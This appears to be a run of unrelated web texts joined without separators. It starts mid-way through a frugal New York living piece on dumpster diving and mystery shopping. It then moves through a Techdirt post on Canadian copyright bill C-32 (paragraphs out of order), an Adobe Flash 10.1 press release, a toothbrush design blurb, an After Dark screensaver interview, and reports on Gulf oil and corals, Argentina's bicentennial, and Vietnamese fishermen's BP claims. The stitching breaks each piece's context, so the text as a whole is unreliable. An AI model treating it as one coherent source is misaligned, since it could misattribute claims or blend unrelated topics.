It ’s covered with rolled oats , and inside is chuck full with nuts and cranberries .
They ’ve also got nice plain whole wheat loafs , and some serious chocolate brownies .
An excess of bagels can be found nightly at Daniel ’s Bagels in Murray Hill , or Bagel Store in Williamsburg .
For Daniel ’s , do n’t just hone in on the first bag you find .
They usually put out 2 - 3 bags of just bagels — the freshest will often still be warm , and will always have several bagels still stuck together .
That ’s how you know they ’re fresh off the baking pan .
Fruits and Vegetables :
On the Chrystie Street edge of the Whole Foods in the Bowery , between around 4 - 6:30 PM you ’ll find rows of green dumpsters that on any given day are full to the brim with fruit and vegetables .
It ’s somewhat hit or miss , so if you do n’t strike gold the first time do n’t be discouraged .
For dairy and meat , Gristedes and D’Agostino also offer a wider array of finds .
Pretty much every store is good , but I have particular luck with the branches in Murray Hill .
Especially the Gristedes on 32nd Street and Third Avenue .
Not only do I routinely get vegetables , dairy , and meat , but this is the main spot where I find special treats like the aforementioned smoked salmon .
Transportation
While the number of people who bike to work rose 35 % in 2008 , I ’d bet a lot of money that even among those most did not bike in the dead of winter .
I know because I was out on the streets , come snow or blistery winds , and I can tell you , there were certainly a lot less bikes than there is now .
While I am a huge fan of biking , even I admit it ’s not for everyone .
You will get into accidents .
I do n’t care how cautious you are .
If you do n’t feel you can afford to hit the pavement every once in a while , then biking probably is n’t for you .
Even I sometimes drop the cash to take the train if I ’m on my way to a photography gig ; my camera is just too valuable to risk a long ride .
Entertainment
I always take full advantage of free museum days and summer concert series during summer , but I also have a few money - saving tricks that are n’t so obvious .
Movies :
If you do n’t have a Brooklyn Library card already , get one .
Their movie collection is actually pretty impressive , and while it can be hard to just walk in and find the title you want , you can request anything in their system to be shipped to the branch nearest you .
Eating Out : Two words — mystery shopper .
For obvious reasons , there is a limit to what I can say about this , but I highly recommend searching around Craigslist for people advertising jobs as mystery shoppers .
It allows me to drop $ 240 on a dinner for two without having to actually pay .
Drinking : Probably my favorite way to drink for free is the weekly see - and - be - seen fest that is gallery openings in Chelsea .
Not only is the booze free , but it tends to be decent , often with accompanying snacks .
Plus you get to look vaguely classy in the process , making this a great idea if you want to hang out with a friend who has slightly higher standards .
A little advice : I ’ve found a somewhat intriguing negative correlation between the quality of the artwork and the quality of the free handouts .
In the end , I ’m not sure how long I ’ll live like this .
While I ca n’t say that I feel like I ’ve missed out at all by living such a thrift - conscious lifestyle , I admit my current situation is not ideal .
There are some things that I ’ve yet to find a solution .
For example , if anyone knows an affordable darkroom rental , uh , let me know .
And certainly , if I landed one of those salaried jobs I sometimes fantasize about , I ’m sure I ’d spend more money .
But until then , I know I can live for a year on less than some people in this city spend in a month .
Tags
21 Comments
Pushing For More Stringent Copyright Laws Is The Opposite Of Allowing ' Market Forces ' To Act
from the why - so - much - confusion dept
That a Heritage Minister does n't understand this is troubling .
That he would accuse those who seek to point out this fact and raise awareness to it as " radical extremists " is scandalous .
Canadians have entrusted in this person the responsibility for creating a marketplace that rewards creativity , content creation and innovation while protecting the rights of consumers .
At the moment , we have a minister who shuts out the very two groups he claims to protect while wrapping himself in a false cloak of the " free market . "
It is an ominous start for the debate over copyright reform and the minister has only himself to blame
Thank you for reading this Techdirt post .
With so many things competing for everyone ’s attention these days , we really appreciate you giving us your time .
We work hard every day to put quality content out there for our community .
Techdirt is one of the few remaining truly independent media outlets .
We do not have a giant corporation behind us , and we rely heavily on our community to support us , in an age when advertisers are increasingly uninterested in sponsoring small , independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis .
While other websites have resorted to paywalls , registration requirements , and increasingly annoying / intrusive advertising , we have always kept Techdirt open and available to anyone .
But in order to continue doing so , we need your support .
We offer a variety of ways for our readers to support us , from direct donations to special subscriptions and cool merchandise — and every little bit helps .
Thank you .
– The Techdirt Team
We 've seen this mistake in the past , and it's a shame that politicians and defenders of stronger copyright still make this claim , but it 's flat out wrong to say that copyright ( or patents , for that matter ) are about " allowing market forces " to act. , copyright and patent laws are the opposite of allowing market forces .
It 's the government stepping up and providing monopoly rightsthey believe ( rightly or wrongly ) that basic market forces do n't work in those areas and , thus , the government needs to step in and " correct " some sort of imbalance .
So it 's really a shame to see Canadian politicians defending the proposed copyright reform bill there , C - 32 , by claiming that it 's about enabling " market forces . "
That link ( found via Michael Geist ) highlights a Twitter debate that took place between well - known author / blogger / speaker Cory Doctorow and the leading voice behind C - 32 , Canadian Heritage Minister , James Moore .
Moore , famously , last week attacked any critics of the bill by calling them " radical extremists " and " babyish . "
While he later denied saying these things , unfortunately for Moore , the whole thing was caught on video tape .
The episode has resulted in many concerned Canadians to speak out , and point out that having concerns over the bill does not make them " radical extremists . "
Doctorow took particular offense to the whole thing and started asking Moore a bunch of questions via twitter , which we 'll try to embed at the bottom of this post ( if it does n't work , the link above to David Eaves ' website has some screen shots ) .
Eaves points out just how many times in the conversation Moore resorts to claiming that this is all about " market forces " saying things like : " Have some faith in market forces - is working w/ music & movies .
Let creators create , and consumers consume what they want . "
Eaves counts that Moore resorts to the claim of " market forces " six times in a total of 22 Twitter messages .
It 's not only a dodge by Moore , it 's blatantly false .
As both Eaves and Doctorow point out , the whole point of this bill is to remove free market forces , and have the government tilt the scales to one side because it believes the market , without government monopoly protection , fails .
Doctorow tries to point this out to Moore , who does n't appear to actually be paying attention -- or understanding the issue at all .
Eaves points out the ridiculousness of the whole situation :
It would be great if we could get past this myth , but it seems like many politicians like to hold up the myth that copyright is about " market forces " to get away from having to actually defend the harm that overly aggressive copyright law can create .
Filed Under : canada , copyright , cory doctorow , james moore , market forces
Alright folks ,
Adobe has made their move !
After what seems like forever , Adobe has officially released their platform to their mobile partners ( including Android , BlackBerry , webOS , future versions of Windows Phone , LiMo , MeeGo and Symbian OS ) , getting past another stopping point on their way to releasing it to the hungry public .
While this release has been expected and does n’t come as a surprise , it ’s nice that it ’s out in the open and out of the beta stages .
Being one of the focus points of Android software 2.2 , this announcement is important for Android users because it means 2.2 ( or Froyo ) will be out that much sooner to the general populace .
The new Flash is made viable for mobile by using new tools that can be incorporated into each Flash animation .
These tools include being able to use the device ’s accelerometer , and a new feature called Smart Zoom that allows the content to intelligently fill the device ’s screen .
Another point worth mentioning is that apparently , fears regarding battery life or performance of a Flash - using device can be put at ease .
According to a Mr. Michael Gartenberg from the Altimeter Group , “ Overall , my experience with Flash on Android was pretty good .
Sites that did use Flash loaded relatively quickly and effortlessly .
It was fun to surf to a site and not get an error message because Flash was being used .
Performance worked well and sites loaded quickly and fairly complex animations and user experiences worked quickly and looked good .
Adobe has done a good job making the case that Flash is viable for mobile . ”
According to Adobe , the new software closely monitors the device ’s performance and adjusts the RAM being used based on any slowdown or memory clogging .
Another feature slows down the Flash processes as soon as the device is put into sleep mode or pauses them as soon as a phone call or device function interrupts .
All in all , some pretty impressive things coming our way with the Froyo 2.2 update .
Personally , I ’m hoping for sooner rather than later , but this is going to be a very important release for Adobe .
With things with Apple getting ugly and public , quality and being relatively bug free is going to be of the utmost importance here .
Adobe ’s Full Press Release :
“ HBO , Viacom , Turner , Warner Brothers , Sony Pictures , CBS Interactive , USA Network and
Others Ready Flash Content for Mobile SAN FRANCISCO , CA . — June 22 , 2010 — Adobe Systems Incorporated ( Nasdaq : ADBE ) today announced
the release of Adobe® Flash ® Player 10.1 to mobile platform partners .
Redesigned from the ground up with new
performance and mobile specific features , Flash Player 10.1 is the first release that brings the full web across
desktops and devices .
Mobile users will now be able to experience millions of sites with rich applications and
content inside the browser including games , animations , rich Internet applications ( RIAs ) , data presentations and
visualizations , ecommerce , music , video , audio and more .
Already the top free app on Android™ Market today , Flash Player 10.1 will be available as a final production
release for smartphones and tablets once users are able to upgrade to Android 2.2 “ Froyo . ”
Devices supporting
“ Froyo ” and Flash Player 10.1 are expected to include the DROID by Motorola , Dell Streak , Google Nexus One ,
Motorola MILESTONE , HTC Evo , HTC Incredible , HTC Desire , Samsung Galaxy S and others .
Flash Player 10.1
was also released to mobile platform partners to be supported on devices based on Android , BlackBerry , webOS ,
Windows Phone 7 Series , LiMo , MeeGo and Symbian OS , and is expected to be made available via over - the - air
downloads and to be pre-installed on smartphones , tablets and other devices in the coming months .
“ We are thrilled that more than three million Flash designers and developers are now able to unleash their
creativity on the world of smartphones , tablets , netbooks , televisions and other consumer electronics , ” said David Wadhwani , general manager and vice president , Platform Business at Adobe .
“ The combined power of the
leading rich media technology platform with millions of passionate creatives is sure to impact the world in ways we have n’t even imagined yet . ”
Broad Partner Support
Device and technology partners including ARM , Motorola , Dell , RIM , Samsung , Google , HTC , NVIDIA ,
Qualcomm , Intel , Microsoft , Texas Instruments , Brightcove and others announced more specifics around their
support for Flash Player 10.1 today .
Major content publishers including Viacom , HBO , Msnbc Digital Network ,
Turner , USA Network , Photobucket , Kongregate , Nickelodeon , Sony Pictures , Warner Brothers , CBS Interactive ,
South Park Studios , Armor Games , cnet.com , Mochi Media , Blitz , Odopod , JustinTV , AgencyNet , Roundarch ,
RAIN and many others have also started to optimize Flash content to deliver the best possible experience within the context of smaller screens , which includes larger buttons for interactions , layout adjustments for mobile
screens and more .
For details visit [ insert Quote Page URL ] or m.flash.com , Adobe ’s showcase site for optimized Flash content .
For
more information on how to optimize Flash content for mobile , visit www.adobe.com/go/fmobile.
New High Performance Features
Completely redesigned and optimized for mobile , Flash Player 10.1 delivers new interaction methods with support
for mobile - specific input models .
Support for accelerometer allows users to view Flash content in landscape and
portrait mode .
With Smart Zooming , users can scale content to full screen mode delivering immersive application like experiences from a web page .
Performance optimization work with virtually all major mobile silicon and
platform vendors makes efficient use of CPU and battery performance .
The new Smart Rendering feature ensures that Flash content is running only when it becomes visible on the
screen further reducing CPU and battery consumption .
With Sleep Mode , Flash Player automatically slows down
when the device transitions into screen saver mode .
Advanced Out - of - Memory Management allows the player to
effectively handle non-optimized content that consumes excessive resources , while automatic memory reduction
decreases content usage of RAM by up to 50 percent .
Flash Player pauses automatically when events occur such as incoming phone calls or switching from the browser to other device functions .
Once users switch back to the browser , Flash Player resumes where it paused .
Industry Analyst Feedback
“ Although it is labeled a dot release , Flash Player 10.1 is a significant update that includes a number of new
performance and mobile specific features , ” said Al Hilwa , program director of the Application Development
Program at IDC .
“ This allows consumers to see a much bigger part of the web and allows developers to bring
their Flash platform skills to a much bigger swath of devices . ”
“ For the past few weeks I have had the opportunity to test an Android Froyo device loaded with a beta of Flash
Player 10.1 , ” said Ben Bajarin , principal analyst at Creative Strategies .
“ The overall experience and performance
of Flash has been impressive .
Mobile users now have access to full web pages with rich Flash content on millions
of sites .
With the new mobile specific features , developers also have an important opportunity to help shape the
way Web content , games , touch capabilities and more are presented across platforms and devices as Froyo and
other platforms deliver full Flash support . ”
Additional Resources
To watch demo videos of Flash Player 10.1 running across devices , including smartphones and tablets , visit
www.adobe.com/devnet/devices/demos ( insert hyperlink ) Availability
Flash Player 10.1 is expected to be available as a final production release for devices once users are able to
upgrade to Android 2.2 “ Froyo . ”
Once upgraded , smartphones , tablets and other devices can be updated with
Flash Player 10.1 over - the - air via numerous ways including content triggered downloads , system software
updates and on - device app catalogs such as Android Market , Adobe Labs and other venues .
The upgrade
mechanism will vary by device and device manufacturer .
The desktop version of Flash Player 10.1 for Windows ,
Mac OS and Linux is available on http://get.adobe.com/flashplayer/ today . ”
[ via slashgear ]
Who wants a filthy , dried - paste encrusted cup in their bathroom to re-up the germs on their toothbrush twice a day ?
What you need , you filthy little person , is the Dews Toothbrush , a fat , finger - friendly design with a round , weighted base that keeps it upright on the bathroom shelf .
The bristly head is kept free of any contact other than that with your fetid cake - hole .
Incredibly simple and , now we 've seen it , incredibly obvious , the Dews has been judged clever enough to win a Red Dot award for designer Lee Eunhak of the Ryan Harc studio .
Hopefully this added prestige will be enough to bring the wobbly toothbrush to market , whereupon it will instantly replace my mouth - coddling Colgate 360 º .
I only hope that house guests do n't see this sitting ( standing ? ) next to the sink and decide they need to poke it with their filthy fingers , ruining the whole point .
Toothbrush Upstanding Tall , With Pride [ Yanko ]
DEWS red dot award [ Red Dot ]
DEWS Tooth brush [ Ryan Harc ]
Ever bought a piece of software back in the day that made you go Wow !?
Not being able to wait to open it ?
Just sensing true greatness lying within the box ?
Something on that disk you knew without a doubt you ’d never forget ?
Old timers , get ready for a time warp here – and even young squirts like myself will remember this one .
Remember the squadron of Flying Toasters flying across your computer screen ?
Aquatic Realm , anyone ?
How ’bout Starry Night to light up the night ?
Yep , I see that grin on your face !
Those were only a few of the wonderful modules that were a part of the unforgettable screen saver known as After Dark .
After Dark will forever be remembered as the screen saver that got the screen saving boom started in the 90s .
Through the artistic foresight and the engineering spirit of two people , Jack Eastman and Patrick Beard , After Dark was born .
It started life on the Macintosh .
Later , Berkeley Systems , the publisher of After Dark , along with Jack Eastman and Patrick Beard , would team up with Bill Stewart and Ian MacDonald at Software Dynamics .
Through this collaboration , After Dark for Windows was born .
( Stewart and MacDonald were the creators of the Magic screen saver , which was the first screen saver for Windows .
For a more in - depth history of Magic as well as After Dark , check out the Software Dynamics website . )
The Birth of After Dark
The year was 1994 .
While I was still in the PC world , my first experience with a screen saver was with After Dark 2.0 .
I still have fond memories of that day – a relative of mine gave me a piece of software known as a “ screen saver ” , which I had never heard of .
I checked out the box and got this feeling , “ This is gonna be cool ! ”
Digging through the box , I found the installation floppy neatly placed in its envelope .
After more looking , I spotted the manual as I started about the process of installing After Dark .
Once installed , I was in complete awe of each and every module .
With eyes glued to the screen , I stayed up late into the night watching in awe as the artwork and images flooded the screen and my memory .
From that point on , I was a devoted After Dark fan .
Three of After Dark ’s biggest draws were :
Roll Your Own Modules :
Anyone could try their hand at creating their own modules .
Berkeley Systems even held contests annually for the best module .
Some of those same modules found their way into future versions of After Dark .
This inspired more creativity , which in turn led to finding more talented artists in the screen saver genre .
Randomizer : Ever get tired of clicking on each individual module ?
Or perhaps you ’re one of those who likes to shuck and jive things up ?
A little pizzazz if ya will …
Instead of selecting each module to run manually , you could add as many to the Randomizer as you wished .
A slider bar would let you select the interval of time each module would be displayed before moving onto the next .
You could have the modules follow in order or at random .
You could even have multiple Randomizers .
An example of this would be in one Randomizer , you could have all the After Dark 2.0 modules and in another you could have all the Star Trek models just to keep things all nice and tidy !
MultiModule : Whadda ya get when you take two or more of your favorite modules and throw ’em all together ?
MultiModule of course !
The idea here was to take two or more modules and combine them into one to create even more awe and bewilderment .
One example is Toasters in Space .
Did ya ever wonder how’d they do that ?
Take one part Flying Toasters , another part Warp and Voila !
Toasters in Space !
More versions would follow .
My next purchase was More After Dark , which added 25 more modules to After Dark 2.0 .
There were other screen savers that carried the proud lineage of the After Dark name and tradition , which continued to capture imaginations , such as Disney , Star Trek , The Simpsons , Marvel Comics , Looney Toons , and Totally Twisted .
In addition to Macintosh and Windows versions , there was also a standalone DOS version .
I moved up to 3.0 , then to 4.0 .
Unfortunately , 4.0 was the last major version of After Dark .
With the advent and popularity of free screen savers , along with the boom of the Internet , After Dark ’s star eventually burned out .
Berkeley Systems would eventually fade into obscurity when it was bought out by Sierra .
Sierra would go on to release After Dark Games , which were wonderful , not to mention fun games based on the After Dark screen saver .
Although no newer After Dark versions would see the light of day , Sierra would repackage the major versions under different names : After Dark Classic , After Dark Deluxe , and After Dark Midnight Edition , to name a few .
Eventually After Dark saw its end as far as Sierra was concerned in the early 00s .
As part of this tribute to After Dark , I recently interviewed Jack Eastman and Patrick Beard , who created After Dark , along with Bill Stewart , who worked with Jack and Patrick to port it to Windows .
Be sure to come back for my interviews with Patrick Beard and with Bill Stewart .
This is my interview with Jack Eastman .
Tommy :
It ’s quite an honor to interview you .
How did After Dark see the light of day ?
What was the inspiration behind it ?
Jack : I actually never intended it to see the light of day .
It was a personal project .
I was working on my Ph.D. thesis project at the Lawrence Berkeley Laboratory .
I taught myself to program the Macintosh during that time .
It was fun and exciting to work with the Mac in those days – I ’m talking about 1986 .
I had learned Pascal in college at UCSD in probably 1981 .
I wanted to do some graphics programming on the Mac – most of my programming before that was done on machines that did n’t support great onscreen graphics .
Teraks at UCSD , Commodore PET and VAX at Berkeley .
Scientific American had some articles about graphics algorithms for fun things like expanding ripples on water .
Just line - drawing stuff .
I wanted to try those on the Mac .
I did one or two , and it occurred to me that it would be fun to have them as a screen saver .
As I started to dig in , I found that it was much , much harder to write a screen saver than to do the graphics .
So my idea was , let ’s solve the screen saver problem once , then have the graphics be modular – build the TV and then change the channel .
As I dug in to systems programming on the Mac , it became really hard .
There was no concept in the OS of a screen saver , so I had to hack everything .
A friend of mine at LBL , Patrick Beard , helped me figure some things out .
He was a programmer for the Astrophysics group down the hall .
Anyway , I decided the best way to get close to the iron on the Mac was to do it in assembly language .
It was the only way to hack the OS calls in those days .
I had to patch OS calls to notice periods of inactivity , stay on top of all windows , notice the mouse moving , and so forth .
At some point I had something working , and I gave a copy to Patrick .
By that time he was working at Berkeley Systems – working on Mac utilities .
Berkeley Systems had a virtual screen program for Mac – you could move the mouse to an edge of the screen and push and see more screen there .
Great tool on a 9 ″ screen .
Also a screen magnifier for low vision
Patrick was working on a network - based application - sharing program – way ahead of its time .
Tommy : I heard about the screen magnifier at some point .
Jack : inLarge it was called .
The virtual - screen program was Stepping Out .
Tommy : I ’ve heard of that .
Jack : Anyway , I gave him that early version of After Dark ( it had no name at that point ) , and he ran it at work .
At some point the boss walked by and saw a fun screen saver on Pat ’s screen and later , saw another .
He asked what it was – Patrick put him in touch with me .
We did a deal where I agreed to finish it up – do what was needed to bring it to market .
Wes Boyd was the boss .
He thought we ’d sell a few units – a niche product like Stepping Out .
But it caught on and scared us all .
Tommy : Ha ha !
Big !
Jack : Yeah , big .
We decided we had to professionalize quick .
Wes ’ insight was that we needed to bring artistry to it .
1.0 was all line - art stuff : water ripples , worms crawling around the screen , rainfall , stars .
For 2.0 we needed to build more personality into it – really engage .
We thought this over in the abstract for quite a while .
My wife ’s a doctor – she was doing her residency then and was frequently gone overnight .
So I ’d sit up late programming .
Very late .
I had a Mac II with a color screen – $ 5,000 computer in those days .
One of those late nights I was thinking about the artistry problem – how to do something really fun for 2.0 .
I was wandering around the house .
I drifted into the kitchen , and the toaster caught my eye .
My sleep - deprived brain put wings on it .
I went upstairs and drew some animation frames – I used the development system ’s icon editor .
Little white outline toasters on a black background with little stubby plucked - chicken wings speed lines and a flapping electrical cord .
I coded up the animation that night and brought it to Berkeley Systems the next day .
Everybody thought it was hilarious and everybody agreed it needed to be redrawn .
Wes brought in an artist to re-render the toasters , and Patrick re-coded the module in C .
The modules all had a little control panel – I insisted on having a slider that controlled the doneness of the toast .
The other thing we were careful to do was not to put the toasters on a track and repeat the show .
Random numbers were always important from that point on .
I had done Monte Carlo simulations in my physics work and knew how to produce random numbers in various distributions .
I think that was an important idea – we had these little movies , but you could n’t predict them .
Competitors did n’t have that insight .
With After Dark you could just zone out and watch for a long time .
Plus it was really a screen saver – it would n’t do to have images sitting in one place or in repeating patterns .
Tommy : I definitely concur with that .
I ’m still in awe of After Dark to this day .
I can watch it for hours on end and never get tired of it .
How did After Dark 2.0 differ from 1.0 overall ?
Jack : Miles of difference .
The difference between an engineer and an artist .
Tommy : Let me dig a little deeper here .
What did 1.0 include module - wise , and did it ever ship in a retail box like 2.0 did ?
Jack :
Oh yes , it was boxed .
Shipped on floppies .
Included raindrops , Starry Night , worms .
I do n’t remember all of them , but there was not a single bitmapped image .
Everything was lines and circles .
Big hit nevertheless .
Tommy :
The reason I ask this is because everyone always talks about 2.0 and later versions .
I personally have never seen 1.0 myself .
Jack :
Well , 2.0 was really the breakout .
We had learned a lot technically , artistically , and in terms of marketing .
The box was a lot more attractive , the engine more stable and played better with others , and it featured Toasters and Fish .
Tommy : Part of the After Dark experience was when I first saw the box .
It screamed “ darkness ” .
I just knew that I would enjoy it from the time I first looked at the box .
Even the installation program had a great sense of humor .
Other than you and Patrick , who were the other creative forces behind After Dark ?
Jack : Well , Nick Rush , who was VP of Marketing , had a lot of great input .
And later , Igor Gasowski built a very strong design department and was a huge creative influence .
Wes ’ wife , Joan Blades , did the first box cover art , which I always thought was great .
Tommy : Tell me how Bill Stewart and Ian MacDonald came into the picture , thus leading to the Windows port of After Dark ?
Jack :
Well , at some point in the early 90s it became clear that Windows was real and would challenge the Mac .
Nobody in the company knew anything about it .
So I think it was Wes who cast around and found these guys .
Tommy :
What was it like collaborating with Bill and Ian ?
Jack :
They had their own world .
We were wary of Windows and just feeling like we had really conquered the Mac , both technically and in marketing terms .
They were the prophets of a new religion .
We were uncomfortable , because we could n’t evaluate what they were doing very well – being totally ignorant of the new platform .
Ultimately they did a fantastic job .
Tommy :
In my mind , After Dark 2.0 had a “ darkness ” , a sense of the modules actually portraying the idea of “ After Dark ” , through many of the modules such as Nocturns , Zot , Starry Night as well as others .
Was this how you envisioned After Dark and the latter versions to follow both 1.0 and 2.0 ?
Jack : Yes .
In those early days we took the screen - saving very seriously ( later CRTs had phosphors that were much longer - lasting ) .
So it translated into a dark artistic outlook .
Tommy : I have several compact Macs as well as PCs running After Dark , and especially during Halloween , I ’ll turn on After Dark and put a compact Mac in each window so others can see !
Jack : Ha !
Tommy :
Do you feel the direction and the creativity behind After Dark changed after 2.0 – and if so , in what way ?
Jack : I ’ve always been proud that the Berkeley Systems team remained very strong creatively over a sustained period .
We built some great tools for collaboration between engineers and artists that let artists author experiences that we could then code up in a randomized and modular way .
I think we had one of the strongest cross-disciplinary collaborations of any studio in those days .
Even when we did licensed products like Disney and Star Trek , there was huge creativity coming out of our shop .
Tommy : Did the versions following 2.0 and More After Dark stray from the “ darkness ” aspect in your opinion ?
Jack :
Well , it became less technically important to have the screen be substantially black , so we relaxed some of those guidelines and let the creative juices flow more freely .
Tommy :
In your mind , were 3.0 and later versions better or worse in terms of creativity than 2.0 .
Did they turn out how you had hoped they would ?
Jack :
Oh , I think there ’s no question that we grew creatively .
The team grew physically in size , so many more voices were heard .
Engineers as well as artists contributed creatively .
So I think by the time we did 4.0 and Sick and Twisted and so forth the creativity was really rich .
I think there ’s an enduring charm about some of the 2.0 stuff – but we tried to make sure that stuff was always part of the mix , too .
I articulated it at one point :
Our philosophy was to remain “ aggressively stupid ” .
Even my old toaster art got resurrected as ProtoToasters in 4.0 , I think .
Tommy : How long did you remain a part of the After Dark team ?
Jack :
How long was I involved ?
I started working on my own in about 1986 .
I graduated ( against all odds ) in 1990 – and immediately joined Berkeley Systems as VP Engineering .
I stayed with the company for a while after its sale but left in 1998 .
I wanted to flex my engineering muscles a little at that point – I ’d been in management for a long time – so I worked on After Dark Games as a consultant .
I was sort of Alpha Geek for that project .
Then I did my obligatory Internet startup company , which lasted four years .
Now I ’m consulting again .
I love working out of my attic .
I ’m playing Puccini ’s “ Turandot ” at high volume now .
Tommy : After Dark was and still is my all - time favorite program .
I was deeply saddened when After Dark was finally “ laid to rest ” , so to speak .
I continued supporting After Dark and its subsequent versions .
How did you feel when you learned there would not be an After Dark 5.0 ?
Were there ever plans for a 5.0 ?
Jack :
We never had plans that I recall .
The bloom was off the whole screen saver market by late 1990s .
Harder to justify new versions .
But we had a big hit in “ You Do n’t Know Jack ” , and we were trying hard to figure out how to do new things on the Internet .
Well , the economics really changed .
The company was sold and sold again , and the studio finally shut down .
There ’s nobody doing really creative screen savers these days , that I know of .
Tommy :
That ’s a shame , too !
Jack :
The good news is that there ’s huge creativity in the game sector .
The game studios are doing well now – though it ’s becoming more like Hollywood in scale .
But if you want to see some of the old After Dark charm , check out something like Wii Sports .
Tommy :
Have you personally ever considered releasing another screen saver in the spirit of After Dark ?
A 5.0 if you will .
Jack : Naw .
I admit it would be fun !
But I ’ve got other creative and technical interests now , and the market ’s no longer there .
Mainly from a technical standpoint : I feel like I ’ve solved that problem already and I want to spend my time on other challenges .
Tommy :
In your mind , what was the defining feature or part of After Dark that made it unique ?
Jack : Charm ; creativity ; non-repetitiveness ; stupidity .
Tommy :
What ’s your favorite module of all time ?
Jack :
After all this – still gotta be those toasters , man .
Tommy :
What do you want those who read this article to know about After Dark they may not know already ?
Jack : I guess that we never saw it coming .
We were just having fun – we had no clue that it would catch on like that !
Tommy : Hey Jack , I wanna thank you again for this interview .
It was truly a blast to be able to hear from you .
I ’ll never forget After Dark .
Jack : Happy to oblige !
Come back for my interview with Patrick Beard , who worked alongside Jack in creating After Dark !
Go to the After Dark Interviews index .
Keywords : #afterdark #screensaver
Short link : http://goo.gl/cgPMji
searchword : afterdark
Like this : Like Loading ...
This oily haze could prove highly toxic to coral reefs .
Both oil and dispersants , which chemically resemble dishwashing detergent , hamper the ability of corals to colonize and reproduce .
And these effects are amplified when the two are mixed .
Image A deepwater coral reef in the Gulf of Mexico provides a home to many species .
At least three such reefs lie beneath the oil slick .
Credit ... National Oceanic and Atmospheric Administration
Studies on the effects of oil and chemicals on coral are limited to the shallow - water variety , however .
Essentially no research has been conducted on their slow - growing deepwater cousins .
So BP ’s spill has prompted scientists to embark on a sudden crash course on the interaction of deep - sea biology with these toxins .
“ Everybody ’s scrambling , ” said Steve W. Ross , a marine biologist at the University of North Carolina , Wilmington , and an expert on deepwater corals .
“ There ’s a lot of evaluation that has to be done . ”
But some believe that studies on the impact of oil and dispersants should have been done long ago , given the proliferation of drilling rigs in the Gulf of Mexico .
“ Some of these studies were proposed years ago , and the agencies decided not to fund them , ” Dr. Ross said .
“ We ’re paying the price for it now . ”
The BP spill coincides nonetheless with a fertile period of deep - ocean exploration in the Gulf of Mexico .
Over the past decade , the Minerals Management Service  the federal agency criticized by lawmakers for its oversight of the offshore drilling industry  has financed extensive research into mapping the life of the deep ocean .
On numerous voyages , researchers have scanned the sea floor for anomalies and deployed submersible robots to search for life in the icy depths .
The result has been a string of discoveries across the northern gulf , among them prolific deepwater reefs the size of football fields or larger .
The identification of new species has become commonplace .
Two hundred years ago , in Buenos Aires ( then capital of a Spanish colony ) , a week - long series of revolutionary events took place , known as the Revolucion de Mayo , which set in motion events that led to Argentina 's eventual declaration of independence from Spain in 1816 .
This week , millions of Argentinians , their neighbors and foreign dignitaries gathered in Buenos Aires to celebrate their bicentennial with lavish parades festivals and performances .
Collected here are recent scenes from Argentina as its citizens commemorate 200 years of eventful history .
( 30 photos total
Volunteer lawyers at the afternoon clinic said such legal problems have become commonplace among Vietnamese immigrants in the gulf .
Private lawyers have descended on the area , one of the first neighborhoods to rebuild after Hurricane Katrina and home to a cadre of Vietnamese fishermen and seafood workers .
Many in the Vietnamese community signed up with those lawyers , and are only now beginning to question the agreements .
“ Of course I did not understand .
But because she ’s Vietnamese , we trust each other , ” Thoa - Thi Ta said in Vietnamese as a lawyer translated and her brother looked on .
“ She said she would give us money . ”
On Sunday , a volunteer lawyer from Oakland explained to them in Vietnamese what they had signed : a retainer granting their new lawyer 40 % of any money they receive from BP .
After the spill , Ta and her brother met a Vietnamese lawyer from Houston at a local restaurant who promised to help them file claims for damages with BP .
The former refugees , who come from a fishing family in Phuoc Tinh , Vietnam , signed the paperwork in early May , desperate for help .
Last spring , her husband bought a $ 30,000 shrimping boat .
They loaned it to her brother , fishing captain Doan Xuan Ta , 55 , until the oil spill , because he had lost his car , house and everything he owned in Hurricane Katrina .
Thoa - Thi Ta , 56 , drove 2 ½ hours from Opelousas , La. , to Mary Queen of Vietnam Catholic Church in the Village de L’est area of New Orleans on Sunday to get free advice from a Vietnamese - speaking lawyer about her family ’s BP claims .
“ People here are different from the Vietnamese immigrants in California , ” said Thuy Nguyen , who grew up in the neighborhood and now works in Oakland .
" They ’re so innocent .
They will sign up with anyone . ”
Nguyen ’s group billed itself as the first bilingual legal clinic to come to the gulf since the spill .
The19 lawyers and 10 law students from California and five other states had expected to advise hundreds .
Instead , they saw about 50 people during stops in New Orleans ; Biloxi , Miss . ; and Bayou La Batre , Ala .
“ I did n’t realize when I came down that they are fearful of attorneys , ” said Mai Phan , a graduate of Tulane University and Loyola Law School now based in San Jose .
Many of the immigrants she saw felt they had been burned by lawyers -- many of whom were from California , Texas and New York -- who signed them up as clients and then disappeared .
Nguyen said it is not yet clear whether the problems result from predatory lawyers or from the fishermen ’s inexperience with legal matters .
Either way , she said , the community ’s fear of lawyers has become a barrier to assisting them as they seek compensation from BP .
When Rep. Anh " Joseph " Cao ( R - La . ) stopped by to see the clinic last week , he said the legal volunteers may have come too late , since so many like the Tas had already retained private lawyers .
But Nguyen refused to give up .
Before Mass on Sunday , she posted signs outside the church saying , “ We do not want to represent you or take your money , ” and , “ No signing up with lawyers .
No private info requested . ”
At the end of the 11:15 a.m. Mass , she joined the Rev. Vien The Nguyen at the front of the church and attempted to assuage the congregation ’s fears .
She told them that she used to live in the area , that she attended Vietnamese Bible school and that her father ’s name is on a plaque at the church .
“ I had to really reassure them , ” Thuy Nguyen said .
A few fishermen and their wives trickled in .
One woman asked how much she would have to pay .
Some brought paperwork , which the lawyers helped them decipher , referring them to Southeast Louisiana Legal Services , a local legal aid group , for further assistance .
By late afternoon , many of the lawyers were frustrated .
Ann Nguyen , vice president of the Vietnamese American Bar Assn. of Northern California , grew up near here , shucking oysters and peeling shrimp during the summer for spare cash .
The oil spill may be ending that way of life , she said , and many of the immigrant seafood workers she sees do not yet realize it .
That could hurt them as they attempt to file claims for damages with BP , since they are likely to underestimate the toll the spill will take on their families .
Some fishermen left Mass asking the priest when they would be able to get back to work .
“ I just talked to an oyster shucker ; she ’s been doing it since 1982 , since I was born , ” Ann Nguyen said .
“ I do n’t think she understands what ’s happening . ”
Nguyen also reviewed the Tas ’ paperwork .
She and another lawyer offered as much advice as they could before they had to close and fly home Sunday .
" I told them I know you 're stressed , but do n't just sign anything , " said May Nguyen , Thuy Nguyen 's sister and a UCLA law student .
Thuy Nguyen said that in coming weeks , the lawyers plan to report what they saw during the clinic and recommend possible regulations or oversight to the White House initiative on Asian Americans and Pacific Islanders .
-- Molly Hennessey - Fiske , in New Orleans
